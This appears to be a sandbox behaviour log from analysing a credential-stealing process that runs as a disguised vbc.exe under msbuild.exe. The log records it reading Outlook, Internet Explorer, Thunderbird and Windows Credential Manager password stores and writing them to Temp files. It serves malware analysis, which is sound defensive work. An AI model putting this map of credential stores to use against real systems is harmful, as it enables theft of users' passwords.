Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, size = 260 True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt, type = file_type True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer, value_name = svcVersion, data = 72, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer, value_name = Version, data = 8.0.7601.17514, type = REG_SZ True 1
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 False 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt, size = 389 True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
Module Get Handle module_name = mscoree.dll False 1
Fn
Process #5: vbc.exe
226 0
»
Information Value
ID #5
File Name c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
Command Line C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:57, Reason: Child Process
Unmonitor End Time: 00:01:04, Reason: Self Terminated
Monitor Duration 00:00:06
OS Process Information
»
Information Value
PID 0x594
Parent PID 0xb18 (c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 4A4
0x 8CC
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x00400000 0x0041AFFF Marked Executable - 32-bit 0x00410E58, 0x0040D6E0, ... False False
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt 475 bytes MD5: 0e8d54d411f43f166821d012d45b1199
SHA1: a102c887b7ee1e8f1e2555e30c1c58015248251b
SHA256: 72ee1a9d65acc2cf4fea9c11dbec1e6ee7b67fed882b5fd37d69c3692814b4df
SSDeep: 6:QAXqqq9UMe7PQDC+8ADAwzRIjMw1NAmYezRSJcnDWpSnDWAwb:QZ9UHr+8ADzRIRvGe9SJgyp6yAwb 		False
...
Threads
Thread 0x4a4
226 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe, base_address = 0x400000 True 2
Fn
Module Load module_name = comctl32.dll, base_address = 0x73530000 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitCommonControlsEx, address_out = 0x73536be6 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathA, address_out = 0x7621fb26 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, size = 260 True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc_lng.ini, type = file_attributes False 1
Fn
System Get Info type = Operating System True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Profiles, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Thunderbird\Profiles, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird False 1
Fn
File Get Info filename = C:\Program Files (x86)\Mozilla Thunderbird, type = file_attributes False 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, size = 260 True 1
Fn
Ini Read file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg, section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg, section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg, section_name = General, key_name = AddExportHeaderLine, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg, section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg, section_name = General, key_name = WinPos False 1
Fn
Ini Read file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg, section_name = General, key_name = Columns False 1
Fn
Ini Read file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg, section_name = General, key_name = Sort, default_value = 0 True 1
Fn
Module Load module_name = pstorec.dll, base_address = 0x73520000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\pstorec.dll, function = PStoreCreateInstance, address_out = 0x7352526c True 1
Fn
Module Load module_name = crypt32.dll, base_address = 0x759b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptUnprotectData, address_out = 0x759e5a7f True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes False 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x74d871c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x74d4b2ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x74d87941 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x74d87381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x74d87481 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Identities True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Identities True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}, value_name = Username, data = Main Identity, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Identities False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\05cb6f136411cf4daf1f74e966b0a7dc True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\05cb6f136411cf4daf1f74e966b0a7dc False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4b62e5f8c092a64ea9b79fd559a5a15e True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4b62e5f8c092a64ea9b79fd559a5a15e False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\609a848a708f544697003a34105400ef True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\609a848a708f544697003a34105400ef False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\63cba20b08018a458b6edb5d87fb54da True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\63cba20b08018a458b6edb5d87fb54da False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\828cd3a417cead4ab3a214070dce1c3d True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\828cd3a417cead4ab3a214070dce1c3d False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\88d17fec23cbdd4fb54ad1d34c0dce09 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\88d17fec23cbdd4fb54ad1d34c0dce09 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = POP3 User, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = IMAP User, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = HTTP User, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = SMTP User, data = 0, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 User, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = IMAP User, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = HTTP User, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP User, data = 0, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 User, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Server, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = Display Name, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = Email, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP Server, type = REG_BINARY True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP Port, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Port, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Use SPA, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Password, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004, value_name = POP3 User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004, value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004, value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004, value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a533ec91a4f74549ac2130b6908c8aac True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a533ec91a4f74549ac2130b6908c8aac False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b70c659765f94740b657fee657d05ab4 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b70c659765f94740b657fee657d05ab4 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\cce6b8ce16bac4458e5e40e3530d6f1d True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\cce6b8ce16bac4458e5e40e3530d6f1d False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dd7f40a823cda64b92e9a96e9e46e406 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dd7f40a823cda64b92e9a96e9e46e406 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = POP3 User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = IMAP User, data = 103, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = HTTP User, data = 103, type = REG_NONE False 1
Fn
